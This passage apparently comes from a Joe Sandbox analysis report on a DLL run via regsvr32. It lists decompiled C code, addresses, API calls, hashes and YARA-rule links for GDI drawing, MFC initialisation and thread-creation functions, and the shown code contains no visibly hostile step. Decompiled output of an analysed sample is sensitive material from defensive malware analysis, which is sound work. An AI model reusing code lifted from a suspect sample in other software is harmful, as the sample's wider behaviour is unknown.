                                                                                                                Function 100049A0 Relevance: 7.6, APIs: 5, Instructions: 125windowCOMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 81%
                                                                                                                			E100049A0(void* __ebx, int _a4, int _a8, int _a12, int _a16, intOrPtr _a32) {
				char _v12;
				intOrPtr _v20;
				int _v28;
				intOrPtr _v36;
				intOrPtr _v40;
				char _v44;
				intOrPtr _v48;
				void _v64;
				int _v80;
				void* _v84;
				int _v88;
				char _v92;
				char _v96;
				struct HDC__* _v104;
				intOrPtr _v112;
				char _v152;
				char _v160;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t45;
				void* _t49;
				int _t53;
				void* _t73;
				int _t80;
				int _t96;
				void* _t102;
				intOrPtr* _t109;
				void* _t111;
				void* _t117;

				_push(0xffffffff);
				_push(E10051020);
				_push( *[fs:0x0]);
				_push(_t111);
				_push(_t102);
				_t45 =  *0x1006dbdc; // 0xdf7c0cda
				_push(_t45 ^ _t117 - 0x00000030);
				 *[fs:0x0] =  &_v12;
				_t121 = _a32;
				if(_a32 == 0) {
					_t49 = E10024A9A(_a4,  &_a8, 0xf7f8f9);
					 *[fs:0x0] = _v20;
					return _t49;
				} else {
					_t109 = _a4;
					 *((intOrPtr*)( *((intOrPtr*)( *_t109 + 0x24))))(7);
					_t96 = _a16 - 2;
					_a16 = _t96;
					_t80 = _a8 + 1;
					_t53 = _a4 + 0x19;
					_a4 = _t53;
					_a8 = _t80;
					Rectangle( *(_t109 + 4), _t53, _t80, _a12, _t96);
					_v80 = 0;
					_v84 = 0x100572e4;
					_v28 = 0;
					E100247F5( &_v84, _t102, _t111, LoadBitmapA( *(E10023187(__ebx, _t102, _t109, _t121) + 0xc), 0xa8));
					GetObjectA(_v84, 0x18,  &_v64);
					E10023F76( &_v92);
					_v44 = 1;
					E1002452E( &_v96, _t102, _t111, CreateCompatibleDC( *(_t109 + 4)));
					E1002487A(_v96, _v104);
					StretchBlt( *(_t109 + 4), _v48 + 1, _v44 + 1, _v40 - _v48 - 2, _v36 - _v44 - 2, _v104, 0, 0, _v88, _v84, 0xcc0020);
					E10024848( &_v160);
					_v104 = 0;
					E100245A8( &_v152);
					_v104 = 0xffffffff;
					_v160 = 0x100572c4;
					_t73 = E10024848( &_v160);
					 *[fs:0x0] = _v112;
					return _t73;
				}
			}

































                                                                                                                0x100049a0
                                                                                                                0x100049a2
                                                                                                                0x100049ad
                                                                                                                0x100049b1
                                                                                                                0x100049b3
                                                                                                                0x100049b4
                                                                                                                0x100049bb
                                                                                                                0x100049c0
                                                                                                                0x100049c6
                                                                                                                0x100049cb
                                                                                                                0x10004b25
                                                                                                                0x10004b2e
                                                                                                                0x10004b3c
                                                                                                                0x100049d1
                                                                                                                0x100049d1
                                                                                                                0x100049de
                                                                                                                0x100049ec
                                                                                                                0x100049f0
                                                                                                                0x100049f9
                                                                                                                0x100049fc
                                                                                                                0x10004a01
                                                                                                                0x10004a09
                                                                                                                0x10004a0d
                                                                                                                0x10004a13
                                                                                                                0x10004a1b
                                                                                                                0x10004a23
                                                                                                                0x10004a44
                                                                                                                0x10004a55
                                                                                                                0x10004a5f
                                                                                                                0x10004a68
                                                                                                                0x10004a78
                                                                                                                0x10004a87
                                                                                                                0x10004acc
                                                                                                                0x10004ad6
                                                                                                                0x10004adf
                                                                                                                0x10004ae4
                                                                                                                0x10004aed
                                                                                                                0x10004af5
                                                                                                                0x10004afd
                                                                                                                0x10004b06
                                                                                                                0x10004b14
                                                                                                                0x10004b14

                                                                                                                APIs
                                                                                                                • Rectangle.GDI32(?,?,?,?,?), ref: 10004A0D
                                                                                                                • LoadBitmapA.USER32 ref: 10004A39
                                                                                                                • GetObjectA.GDI32(00000000,00000018,?), ref: 10004A55
                                                                                                                • CreateCompatibleDC.GDI32(?), ref: 10004A6D
                                                                                                                  • Part of subcall function 1002487A: SelectObject.GDI32(?,?), ref: 10024882
                                                                                                                • StretchBlt.GDI32(?,?,?,?,?,?,00000000,00000000,?,?,00CC0020), ref: 10004ACC
                                                                                                                  • Part of subcall function 100245A8: DeleteDC.GDI32(00000000), ref: 100245BA
                                                                                                                  • Part of subcall function 10024848: DeleteObject.GDI32(00000000), ref: 10024857
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.436101324.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.436097453.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.437451450.0000000010056000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.438223626.000000001006C000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.438384188.0000000010073000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Object$Delete$BitmapCompatibleCreateLoadRectangleSelectStretch
                                                                                                                • String ID:
                                                                                                                • API String ID: 448305663-0
                                                                                                                • Opcode ID: 82c9b20964a963aab4da962e57504df09b53ac431a8e4d5cce0c4bbee5d3ec72
                                                                                                                • Instruction ID: 5d69bfcb4a3c229f910bdf040e5aadc79639dc101085ecbd92b3a03dd67eb75c
                                                                                                                • Opcode Fuzzy Hash: 82c9b20964a963aab4da962e57504df09b53ac431a8e4d5cce0c4bbee5d3ec72
                                                                                                                • Instruction Fuzzy Hash: BE4145BA2083819FD314DF68D885F5BBBE8FB88710F00891DF58583291DB75E908CB62
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 10021F4B Relevance: 7.6, APIs: 5, Instructions: 124COMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 94%
                                                                                                                			E10021F4B(void* __ebx, intOrPtr __ecx, void* __edx, struct _OSVERSIONINFOA __edi, void* __esi, void* __eflags) {
				intOrPtr _t70;
				signed int _t72;
				char* _t89;
				intOrPtr _t92;
				void* _t101;
				char* _t102;
				signed char _t103;
				intOrPtr _t118;
				void* _t119;
				void* _t120;
				signed int _t129;

				_t115 = __edi;
				_t110 = __edx;
				_push(0xa4);
				E1003D24F(E1005362D, __ebx, __edi, __esi);
				 *((intOrPtr*)(_t119 - 0xac)) =  *((intOrPtr*)(_t119 + 0x10));
				 *((intOrPtr*)(_t119 - 0xa8)) =  *((intOrPtr*)(_t119 + 0x18));
				_t118 = __ecx;
				 *((intOrPtr*)(_t119 - 0xb0)) = __ecx;
				E10020D23(__ecx, 0,  *((intOrPtr*)(_t119 + 0x1c)));
				 *((intOrPtr*)(_t119 - 4)) = 0;
				 *((intOrPtr*)(__ecx)) = 0x1005b3a4;
				E100010F0(__ecx + 0x7c, __edx);
				 *((char*)(_t119 - 4)) = 1;
				if( *((intOrPtr*)(_t119 + 0x20)) == 0) {
					_t115 = 0x94;
					E1003BB70(0x94, _t119 - 0xa4, 0, 0x94);
					_t120 = _t120 + 0xc;
					 *(_t119 - 0xa4) = 0x94;
					GetVersionExA(_t119 - 0xa4);
					if( *((intOrPtr*)(_t119 - 0x94)) != 2) {
						L3:
						 *((intOrPtr*)(_t119 + 0x20)) = 0x4c;
					} else {
						 *((intOrPtr*)(_t119 + 0x20)) = 0x58;
						if( *((intOrPtr*)(_t119 - 0xa0)) < 5) {
							goto L3;
						}
					}
				}
				_t70 = E1003B4DA(0, _t110, _t115, _t118,  *((intOrPtr*)(_t119 + 0x20)));
				_t127 = _t70;
				_pop(_t101);
				 *((intOrPtr*)(_t118 + 0x74)) = _t70;
				if(_t70 == 0) {
					_t70 = E1001726A(0, _t101, _t115, _t118, _t127);
				}
				E1003BB70(_t115, _t70, 0,  *((intOrPtr*)(_t119 + 0x20)));
				_t72 =  *(_t119 + 8);
				 *(_t118 + 0x78) = _t72;
				asm("sbb eax, eax");
				 *((intOrPtr*)(_t118 + 0x54)) =  ~_t72 + 0x7005;
				 *((intOrPtr*)(_t118 + 0x1c4)) = 0;
				_t102 = _t118 + 0x80;
				 *_t102 = 0;
				_t116 = _t118 + 0xc0;
				 *_t116 = 0;
				 *((intOrPtr*)( *((intOrPtr*)(_t118 + 0x74)))) =  *((intOrPtr*)(_t119 + 0x20));
				 *((intOrPtr*)( *((intOrPtr*)(_t118 + 0x74)) + 0x1c)) = _t116;
				 *((intOrPtr*)( *((intOrPtr*)(_t118 + 0x74)) + 0x20)) = 0x104;
				 *((intOrPtr*)( *((intOrPtr*)(_t118 + 0x74)) + 0x3c)) =  *((intOrPtr*)(_t119 + 0xc));
				 *((intOrPtr*)( *((intOrPtr*)(_t118 + 0x74)) + 0x24)) = _t102;
				_t103 = 0x40;
				 *( *((intOrPtr*)(_t118 + 0x74)) + 0x28) = _t103;
				_t114 =  *(_t119 + 0x14) | 0x00080020;
				 *( *((intOrPtr*)(_t118 + 0x74)) + 0x34) =  *( *((intOrPtr*)(_t118 + 0x74)) + 0x34) |  *(_t119 + 0x14) | 0x00080020;
				if(( *(_t119 + 0x14) & _t103) != 0) {
					_t92 =  *((intOrPtr*)(_t118 + 0x74));
					_t48 = _t92 + 0x34;
					 *_t48 =  *(_t92 + 0x34) & 0xff7fffff;
					_t129 =  *_t48;
				}
				 *((intOrPtr*)( *((intOrPtr*)(_t118 + 0x74)) + 8)) =  *((intOrPtr*)(E10023187(0, _t116, _t118, _t129) + 0xc));
				 *((intOrPtr*)( *((intOrPtr*)(_t118 + 0x74)) + 0x44)) = E1003548B;
				if( *((intOrPtr*)(_t119 - 0xac)) != 0) {
					E10017042(0, _t116, _t118, _t119, _t116, 0x104,  *((intOrPtr*)(_t119 - 0xac)), 0xffffffff);
				}
				if( *((intOrPtr*)(_t119 - 0xa8)) != 0) {
					_t116 = _t118 + 0x7c;
					E10002070(_t114, _t118 + 0x7c,  *((intOrPtr*)(_t119 - 0xa8)));
					_t88 = E10001C60(_t118 + 0x7c, 0);
					while(1) {
						_t89 = E1003F23E(_t88, 0x7c);
						if(_t89 == 0) {
							break;
						}
						 *_t89 = 0;
						_t88 = _t89 + 1;
						__eflags = _t89 + 1;
					}
					 *((intOrPtr*)( *((intOrPtr*)(_t118 + 0x74)) + 0xc)) =  *((intOrPtr*)(_t118 + 0x7c));
				}
				return E1003D2D2(0, _t116, _t118);
			}














                                                                                                                0x10021f4b
                                                                                                                0x10021f4b
                                                                                                                0x10021f4b
                                                                                                                0x10021f55
                                                                                                                0x10021f5d
                                                                                                                0x10021f66
                                                                                                                0x10021f70
                                                                                                                0x10021f75
                                                                                                                0x10021f7b
                                                                                                                0x10021f83
                                                                                                                0x10021f86
                                                                                                                0x10021f8c
                                                                                                                0x10021f94
                                                                                                                0x10021f98
                                                                                                                0x10021f9a
                                                                                                                0x10021fa8
                                                                                                                0x10021fad
                                                                                                                0x10021fb7
                                                                                                                0x10021fbd
                                                                                                                0x10021fca
                                                                                                                0x10021fdc
                                                                                                                0x10021fdc
                                                                                                                0x10021fcc
                                                                                                                0x10021fd3
                                                                                                                0x10021fda
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x10021fda
                                                                                                                0x10021fca
                                                                                                                0x10021fe6
                                                                                                                0x10021feb
                                                                                                                0x10021fed
                                                                                                                0x10021fee
                                                                                                                0x10021ff1
                                                                                                                0x10021ff3
                                                                                                                0x10021ff3
                                                                                                                0x10021ffd
                                                                                                                0x10022002
                                                                                                                0x10022008
                                                                                                                0x10022010
                                                                                                                0x10022017
                                                                                                                0x1002201d
                                                                                                                0x10022023
                                                                                                                0x10022029
                                                                                                                0x1002202b
                                                                                                                0x10022031
                                                                                                                0x10022033
                                                                                                                0x1002203b
                                                                                                                0x10022041
                                                                                                                0x1002204b
                                                                                                                0x10022054
                                                                                                                0x1002205c
                                                                                                                0x1002205d
                                                                                                                0x10022063
                                                                                                                0x10022069
                                                                                                                0x1002206f
                                                                                                                0x10022071
                                                                                                                0x10022074
                                                                                                                0x10022074
                                                                                                                0x10022074
                                                                                                                0x10022074
                                                                                                                0x1002208c
                                                                                                                0x10022092
                                                                                                                0x10022099
                                                                                                                0x100220a9
                                                                                                                0x100220ae
                                                                                                                0x100220b7
                                                                                                                0x100220bf
                                                                                                                0x100220c4
                                                                                                                0x100220cc
                                                                                                                0x100220d6
                                                                                                                0x100220d9
                                                                                                                0x100220e2
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x100220d3
                                                                                                                0x100220d5
                                                                                                                0x100220d5
                                                                                                                0x100220d5
                                                                                                                0x100220ea
                                                                                                                0x100220ea
                                                                                                                0x100220f4

                                                                                                                APIs
                                                                                                                • __EH_prolog3_GS.LIBCMT ref: 10021F55
                                                                                                                  • Part of subcall function 10020D23: _memset.LIBCMT ref: 10020D3A
                                                                                                                • _memset.LIBCMT ref: 10021FA8
                                                                                                                • GetVersionExA.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,10050EB0,000000FF), ref: 10021FBD
                                                                                                                • _malloc.LIBCMT ref: 10021FE6
                                                                                                                • _memset.LIBCMT ref: 10021FFD
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.436101324.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.436097453.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.437451450.0000000010056000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.438223626.000000001006C000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.438384188.0000000010073000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: _memset$H_prolog3_Version_malloc
                                                                                                                • String ID:
                                                                                                                • API String ID: 1339555267-0
                                                                                                                • Opcode ID: 3eef9a516c5fcf88d4f8e716f753cfe7c7cd0edecdaf5d76a627adc858079138
                                                                                                                • Instruction ID: 4880349b25da0f992761ceb652654c99e496bcf05ee1633afb7689df58e8127f
                                                                                                                • Opcode Fuzzy Hash: 3eef9a516c5fcf88d4f8e716f753cfe7c7cd0edecdaf5d76a627adc858079138
                                                                                                                • Instruction Fuzzy Hash: 305147B8A00B44DFDB21CF68D980A9ABBE0FF48304F41469AE9999B261C774E944CF11
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 1001EDA8 Relevance: 7.6, APIs: 5, Instructions: 108windowthreadCOMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 95%
                                                                                                                			E1001EDA8(void* __ebx, void* __ecx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				void* _t55;
				signed int _t56;
				void* _t68;

				_push(0x14);
				E1003D1E6(E100532C8, __ebx, __edi, __esi);
				_t55 =  *((intOrPtr*)(_t68 + 0xc)) + 0x2cc;
				if(_t55 > 0xf) {
					L21:
					_t56 = 0;
				} else {
					switch( *((intOrPtr*)(( *(_t55 + 0x1001ef68) & 0x000000ff) * 4 +  &M1001EF40))) {
						case 0:
							__eax =  *(__ebp + 0x10);
							 *__eax = 2;
							 *(__eax + 8) = 1;
							goto L4;
						case 1:
							_t59 =  *((intOrPtr*)(_t68 + 0x10));
							 *(_t59 + 8) =  *(_t59 + 8) | 0x0000ffff;
							goto L3;
						case 2:
							__esi =  *(__ebp + 0x10);
							__ecx =  *(__ebp + 8);
							 *__esi = 0xb;
							__eax = E1002EA76( *(__ebp + 8));
							__eax =  ~__eax;
							asm("sbb eax, eax");
							 *(__esi + 8) = __ax;
							goto L4;
						case 3:
							__eax =  *(__ebp + 0x10);
							 *(__eax + 8) =  *(__eax + 8) & 0x00000000;
							L3:
							 *_t59 = 0xb;
							goto L4;
						case 4:
							__eax = E100173A6();
							__ecx = __ebp + 0xc;
							__eax = E10001050(__ebp + 0xc, __edx, __eax);
							__ecx = __ebp + 0xc;
							 *(__ebp - 4) = 1;
							__eax = E10004FC0(__ebp + 0xc, 0xf1c0);
							goto L19;
						case 5:
							__esi =  *(__ebp + 0x10);
							 *__esi = 3;
							__eax = GetThreadLocale();
							 *(__esi + 8) = __eax;
							goto L4;
						case 6:
							__eflags =  *(__esi + 0x5c) - 0xffffffff;
							if(__eflags == 0) {
								_push( *(__esi + 0x20));
								__ecx = __ebp - 0x20;
								__eax = E10024650(__ebx, __ebp - 0x20, __edi, __esi, __eflags);
								 *(__esi + 0x20) = SendMessageA( *( *(__esi + 0x20) + 0x20), 0x138,  *(__ebp - 0x1c),  *( *(__esi + 0x20) + 0x20));
								 *(__esi + 0x5c) = GetBkColor( *(__ebp - 0x18));
								__eax = GetTextColor( *(__ebp - 0x18));
								__ecx = __ebp - 0x20;
								 *(__esi + 0x60) = __eax;
								__eax = E100246A4(__ebx, __ebp - 0x20, __edi, __esi, __eflags);
							}
							__eflags = __edi - 0xfffffd43;
							__eax =  *(__ebp + 0x10);
							 *__eax = 3;
							if(__edi != 0xfffffd43) {
								__esi =  *(__esi + 0x60);
							} else {
								__esi =  *(__esi + 0x5c);
							}
							 *(__eax + 8) = __esi;
							goto L4;
						case 7:
							__eflags =  *(__esi + 0x64);
							if(__eflags != 0) {
								L15:
								__edi =  *(__ebp + 0x10);
								 *__edi = 9;
								__eax =  *(__esi + 0x64);
								__ecx =  *__eax;
								_push(__eax);
								__eax =  *((intOrPtr*)( *__eax + 4))();
								__eax =  *(__esi + 0x64);
								 *(__edi + 8) = __eax;
								goto L4;
							} else {
								__ecx =  *(__esi + 0x20);
								__eax = E1001E043( *(__esi + 0x20));
								__ecx = __esi;
								__eax = E1001EC6F(__ebx, __esi, __edi, __esi, __eflags, __eax);
								__eflags =  *(__esi + 0x64);
								if( *(__esi + 0x64) == 0) {
									goto L21;
								} else {
									goto L15;
								}
							}
							goto L22;
						case 8:
							__eax = E100173A6();
							__ecx = __ebp + 0xc;
							__eax = E10001050(__ebp + 0xc, __edx, __eax);
							_t44 = __ebp - 4;
							 *_t44 =  *(__ebp - 4) & 0x00000000;
							__eflags =  *_t44;
							L19:
							__esi =  *(__ebp + 0x10);
							__ecx = __ebp + 0xc;
							 *__esi = 8;
							__eax = E1001A203(__ebp + 0xc, __edx, __esi);
							__ecx =  *(__ebp + 0xc);
							__ecx =  *(__ebp + 0xc) + 0xfffffff0;
							 *(__esi + 8) = __eax;
							__eax = E10001020( *(__ebp + 0xc) + 0xfffffff0, __edx);
							L4:
							_t56 = 1;
							goto L22;
						case 9:
							goto L21;
					}
				}
				L22:
				return E1003D2BE(_t56);
			}






                                                                                                                0x1001eda8
                                                                                                                0x1001edaf
                                                                                                                0x1001edb9
                                                                                                                0x1001edc2
                                                                                                                0x1001ef35
                                                                                                                0x1001ef35
                                                                                                                0x1001edc8
                                                                                                                0x1001edcf
                                                                                                                0x00000000
                                                                                                                0x1001edf5
                                                                                                                0x1001edf8
                                                                                                                0x1001edfd
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x1001edd6
                                                                                                                0x1001edd9
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x1001eea9
                                                                                                                0x1001eeac
                                                                                                                0x1001eeaf
                                                                                                                0x1001eeb4
                                                                                                                0x1001eeb9
                                                                                                                0x1001eebb
                                                                                                                0x1001eebd
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x1001edeb
                                                                                                                0x1001edee
                                                                                                                0x1001edde
                                                                                                                0x1001edde
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x1001ef11
                                                                                                                0x1001ef17
                                                                                                                0x1001ef1a
                                                                                                                0x1001ef24
                                                                                                                0x1001ef27
                                                                                                                0x1001ef2e
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x1001eec6
                                                                                                                0x1001eec9
                                                                                                                0x1001eece
                                                                                                                0x1001eed4
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x1001ee05
                                                                                                                0x1001ee09
                                                                                                                0x1001ee0b
                                                                                                                0x1001ee0e
                                                                                                                0x1001ee11
                                                                                                                0x1001ee27
                                                                                                                0x1001ee39
                                                                                                                0x1001ee3c
                                                                                                                0x1001ee42
                                                                                                                0x1001ee45
                                                                                                                0x1001ee48
                                                                                                                0x1001ee48
                                                                                                                0x1001ee4d
                                                                                                                0x1001ee53
                                                                                                                0x1001ee56
                                                                                                                0x1001ee5b
                                                                                                                0x1001ee62
                                                                                                                0x1001ee5d
                                                                                                                0x1001ee5d
                                                                                                                0x1001ee5d
                                                                                                                0x1001ee65
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x1001ee6d
                                                                                                                0x1001ee71
                                                                                                                0x1001ee8d
                                                                                                                0x1001ee8d
                                                                                                                0x1001ee90
                                                                                                                0x1001ee95
                                                                                                                0x1001ee98
                                                                                                                0x1001ee9a
                                                                                                                0x1001ee9b
                                                                                                                0x1001ee9e
                                                                                                                0x1001eea1
                                                                                                                0x00000000
                                                                                                                0x1001ee73
                                                                                                                0x1001ee73
                                                                                                                0x1001ee76
                                                                                                                0x1001ee7c
                                                                                                                0x1001ee7e
                                                                                                                0x1001ee83
                                                                                                                0x1001ee87
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x1001ee87
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x1001eedc
                                                                                                                0x1001eee2
                                                                                                                0x1001eee5
                                                                                                                0x1001eeea
                                                                                                                0x1001eeea
                                                                                                                0x1001eeea
                                                                                                                0x1001eeee
                                                                                                                0x1001eeee
                                                                                                                0x1001eef1
                                                                                                                0x1001eef4
                                                                                                                0x1001eef9
                                                                                                                0x1001eefe
                                                                                                                0x1001ef01
                                                                                                                0x1001ef04
                                                                                                                0x1001ef07
                                                                                                                0x1001ede3
                                                                                                                0x1001ede5
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x1001edcf
                                                                                                                0x1001ef37
                                                                                                                0x1001ef3c

                                                                                                                APIs
                                                                                                                • __EH_prolog3.LIBCMT ref: 1001EDAF
                                                                                                                • SendMessageA.USER32 ref: 1001EE27
                                                                                                                • GetBkColor.GDI32(?), ref: 1001EE30
                                                                                                                • GetTextColor.GDI32(?), ref: 1001EE3C
                                                                                                                • GetThreadLocale.KERNEL32(0000F1C0,00000000,?,?,00000014), ref: 1001EECE
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.436101324.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.436097453.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.437451450.0000000010056000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.438223626.000000001006C000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.438384188.0000000010073000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Color$H_prolog3LocaleMessageSendTextThread
                                                                                                                • String ID:
                                                                                                                • API String ID: 187318432-0
                                                                                                                • Opcode ID: 62dfae7340719bea7615cf68d9534f3c47370a058b5ce6014fda78c19ddc3777
                                                                                                                • Instruction ID: 00b0699e3c53c59abbf3ef17ad68b9bdbfacd4536d62d57434d84be85a47f183
                                                                                                                • Opcode Fuzzy Hash: 62dfae7340719bea7615cf68d9534f3c47370a058b5ce6014fda78c19ddc3777
                                                                                                                • Instruction Fuzzy Hash: 0941243481078ADFCB20DF64D848A9EB7B0FF08310F118959F8969B2A1EB74ED81DB51
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 10015060 Relevance: 7.6, APIs: 5, Instructions: 85threadCOMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 75%
                                                                                                                			E10015060(void* __eflags) {
				char _v12;
				intOrPtr _v16;
				struct _SECURITY_ATTRIBUTES* _v24;
				intOrPtr _v36;
				void* __ebx;
				void* __ecx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t24;
				int _t30;
				intOrPtr _t37;
				intOrPtr _t38;
				void* _t45;
				void* _t56;
				void* _t60;
				signed int _t65;
				void* _t69;

				_t69 = __eflags;
				_push(0xffffffff);
				_push(E100528AA);
				_push( *[fs:0x0]);
				_push(_t45);
				_push(_t56);
				_t24 =  *0x1006dbdc; // 0xdf7c0cda
				_push(_t24 ^ _t65);
				 *[fs:0x0] =  &_v12;
				_t60 = _t45;
				E10021017(_t45, _t56);
				ShowCursor(0);
				 *(_t60 + 0x74) = E100160BC(_t69, 0x24);
				_t30 = GetSystemMetrics(1);
				_t43 = GetSystemMetrics(0);
				GetCursorPos( *(_t60 + 0x74));
				E1001D320(_t60, 0, 0, _t31, _t30, 1);
				 *((intOrPtr*)( *(_t60 + 0x74) + 8)) = 0;
				 *((intOrPtr*)( *(_t60 + 0x74) + 0xc)) = 0;
				 *((intOrPtr*)( *(_t60 + 0x74) + 0x14)) = 0;
				 *((intOrPtr*)( *(_t60 + 0x74) + 0x18)) = 0;
				 *((intOrPtr*)( *(_t60 + 0x74) + 0x10)) = 0;
				 *((intOrPtr*)( *(_t60 + 0x74) + 0x1c)) = 0;
				_t37 = E100160BC(_t69, 0x14);
				_v36 = _t37;
				_t70 = _t37;
				_v24 = 0;
				if(_t37 == 0) {
					_t38 = 0;
					__eflags = 0;
				} else {
					_push(_t60);
					_t38 = E100245C1(_t43, _t37, 0, _t60, _t70);
				}
				 *((intOrPtr*)( *(_t60 + 0x74) + 0x20)) = _t38;
				 *((intOrPtr*)(_t60 + 0x78)) = CreateThread(0, 0, E10014DC0,  *(_t60 + 0x74), 0, 0);
				 *[fs:0x0] = _v16;
				return 1;
			}





















                                                                                                                0x10015060
                                                                                                                0x10015060
                                                                                                                0x10015062
                                                                                                                0x1001506d
                                                                                                                0x1001506e
                                                                                                                0x10015072
                                                                                                                0x10015073
                                                                                                                0x1001507a
                                                                                                                0x1001507f
                                                                                                                0x10015085
                                                                                                                0x10015087
                                                                                                                0x1001508f
                                                                                                                0x100150a7
                                                                                                                0x100150aa
                                                                                                                0x100150b1
                                                                                                                0x100150b7
                                                                                                                0x100150c5
                                                                                                                0x100150cd
                                                                                                                0x100150d3
                                                                                                                0x100150d9
                                                                                                                0x100150df
                                                                                                                0x100150e5
                                                                                                                0x100150ed
                                                                                                                0x100150f0
                                                                                                                0x100150f8
                                                                                                                0x100150fc
                                                                                                                0x100150fe
                                                                                                                0x10015102
                                                                                                                0x1001510e
                                                                                                                0x1001510e
                                                                                                                0x10015104
                                                                                                                0x10015104
                                                                                                                0x10015107
                                                                                                                0x10015107
                                                                                                                0x10015115
                                                                                                                0x10015129
                                                                                                                0x10015135
                                                                                                                0x10015144

                                                                                                                APIs
                                                                                                                • ShowCursor.USER32 ref: 1001508F
                                                                                                                  • Part of subcall function 100160BC: _malloc.LIBCMT ref: 100160D6
                                                                                                                • GetSystemMetrics.USER32 ref: 100150AA
                                                                                                                • GetSystemMetrics.USER32 ref: 100150AF
                                                                                                                • GetCursorPos.USER32(?), ref: 100150B7
                                                                                                                  • Part of subcall function 1001D320: MoveWindow.USER32(?,?,?,?,?,?), ref: 1001D33B
                                                                                                                • CreateThread.KERNEL32(00000000,00000000,Function_00014DC0,?,00000000,00000000), ref: 10015123
                                                                                                                  • Part of subcall function 100245C1: __EH_prolog3.LIBCMT ref: 100245C8
                                                                                                                  • Part of subcall function 100245C1: GetDC.USER32(00000000), ref: 100245F4
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.436101324.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.436097453.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.437451450.0000000010056000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.438223626.000000001006C000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.438384188.0000000010073000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: CursorMetricsSystem$CreateH_prolog3MoveShowThreadWindow_malloc
                                                                                                                • String ID:
                                                                                                                • API String ID: 3747044625-0
                                                                                                                • Opcode ID: 9d56638d0798fa0edfb61b696bbaa9e8c452ee3758c5d68de8c4ebb8d90d6298
                                                                                                                • Instruction ID: 2156ac84355e622140c053a3dacdb82c667ceb93240069a7e395ce59ff294df3
                                                                                                                • Opcode Fuzzy Hash: 9d56638d0798fa0edfb61b696bbaa9e8c452ee3758c5d68de8c4ebb8d90d6298
                                                                                                                • Instruction Fuzzy Hash: 42217CB5A40B00AFD311CF29CC84E17FBE8EF89B10F000A1EF65187661D776E8418B61
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 1001A6FA Relevance: 7.6, APIs: 5, Instructions: 81windowCOMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 97%
